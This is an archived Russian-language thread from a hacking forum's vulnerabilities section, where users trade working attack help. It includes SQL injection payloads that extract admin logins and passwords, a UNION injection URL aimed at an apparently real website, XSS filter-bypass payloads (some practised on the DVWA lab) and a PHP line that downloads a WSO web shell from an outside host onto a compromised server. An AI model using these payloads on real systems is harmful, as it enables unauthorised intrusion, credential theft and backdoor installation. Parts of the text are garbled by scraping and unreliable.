HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19281  
Старый 14.01.2012, 01:12
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
Можно подробней?
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.

Цитата:
Сообщение от None  
admin'or+1+and(select+1+from(select+count(*),conca t((select+login+from+cosm_users+
limit+0,1
),floor(rand(0)*2))x+from+information_schema.table s+grou p+by+x)a)--+a
limit+0,1 при выводе логина, ты скорее всего упустил.
 
Ответить с цитированием

  #19282  
Старый 14.01.2012, 01:43
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
limit+0,1 при выводе логина, ты скорее всего упустил.
Нет. Все есть.
 
Ответить с цитированием

  #19283  
Старый 14.01.2012, 12:48
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
Нет. Все есть.
Код:
Code:
admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+where+login='admin'),floor(rand(0)*2))x+from+information_schema.table s+group+by+group+by+x)a)--+a
Др. вариантов не вижу.

--

Помогите и мне! Как вывести таблицы:

Код:
Code:
http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f
"_" заменяет на пробел кажется или я что-то не так делаю?
 
Ответить с цитированием

  #19284  
Старый 14.01.2012, 14:02
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от NZT  
NZT said:
Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
Для начала написать любое сообщение и определить, где оно выводится на странице.

1) Если вне HTML-тегов, достаточно проверить фильтрацию символа [B]
 
Ответить с цитированием

  #19285  
Старый 14.01.2012, 17:38
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию

M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял.

1)Ты имеешь виду если собшение обычное без добавок html то надо написать

2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом.

2.1) если в исходном коде пусто то проверить символы &lt и &gt

3)Потом в скрипте с алертом вместо <> вписать &lt , &gt , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками.

3.1) Если в скрипте фильтруются
 
Ответить с цитированием

  #19286  
Старый 14.01.2012, 18:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Примеры:

1)

Цитата:
Сообщение от None  
XSS
Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит [B]
[B]

[/QUOTE]
" if author else f"
Цитата:

[B]
YWxlcnQoJ1hTUycp - alert('XSS') в base64.

2)

Цитата:
Сообщение от None  

Даже если кавычка экранируется

Цитата:
Сообщение от None  

2.1)

Цитата:
Сообщение от None  

В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.

Цитата:
Сообщение от None  

В myfunction() содержимое value передается как alert("test").

3)

Цитата:
Сообщение от None  

a = 'XSS';
b = 'blablabla';
c = myfunction(a, b);

Закрываем строку, вставляем свой код.

Цитата:
Сообщение от None  

a = '
';alert('test');b='
';
b = 'blablabla';
c = myfunction(a, b);

Тег script можно закрыть даже внутри строки.

Цитата:
Сообщение от None  

a = '
[B]
3.1)

Цитата:
Сообщение от None  

text = 'XSS';
document.write('' + text + '');

Цитата:
Сообщение от None  

text = '
\x3Cscript\x3Ealert\x28\x27test\u0027\u0029\u003C\ u002Fscript\u003E
';
document.write('' + text + '');

Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.

Цитата:
Сообщение от NZT  
NZT said:
И это же получается не одно сообщение или подругому никак?
Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.

Цитата:
Сообщение от NZT  
NZT said:
возможна ли в DVWA, xss на уровне high а то у меня ничего не получается )
Ни разу не пробовал проходить DVWA
 
Ответить с цитированием

  #19287  
Старый 14.01.2012, 18:51
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
пахекал сайт, стал искать админку
нашел пару подозрительных файлов, открываю — шелл
попытался с него залиться, редактировать файлы, создавать папки — никак
могу только просматривать
есть вомзможность выполнять произвольный php код, но это мало чем помогло, загрузка файлов не работает
sm off
права есть
drwxrwxrwx на все папки
поискал юзера и пасс от бд
он ведь в wp-config.php находится?
не расшифровал
ну собстенно вопрос в том, что можно сделать?
Еслить можно выполнять код + папки на запись, то какая проблема?

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://site.ltd/wso.txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/home/www/123.php"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
P.S. В wp-config.php пасс хранится в открытом виде.
 
Ответить с цитированием

  #19288  
Старый 14.01.2012, 20:18
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию

M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит alert() , а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )

Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.
 
Ответить с цитированием

  #19289  
Старый 15.01.2012, 07:25
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ?
Я уже писал выше, там нужно

Код:
Code:
ript>alert()
потому что вырезает только а не трогает.

Цитата:
Сообщение от None  
И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )
Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.
 
Ответить с цитированием

  #19290  
Старый 15.01.2012, 12:38
Bahamut
Guest
Сообщений: n/a
Провел на форуме:
2229

Репутация: 0
По умолчанию

как залить файл если работает Put Method ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ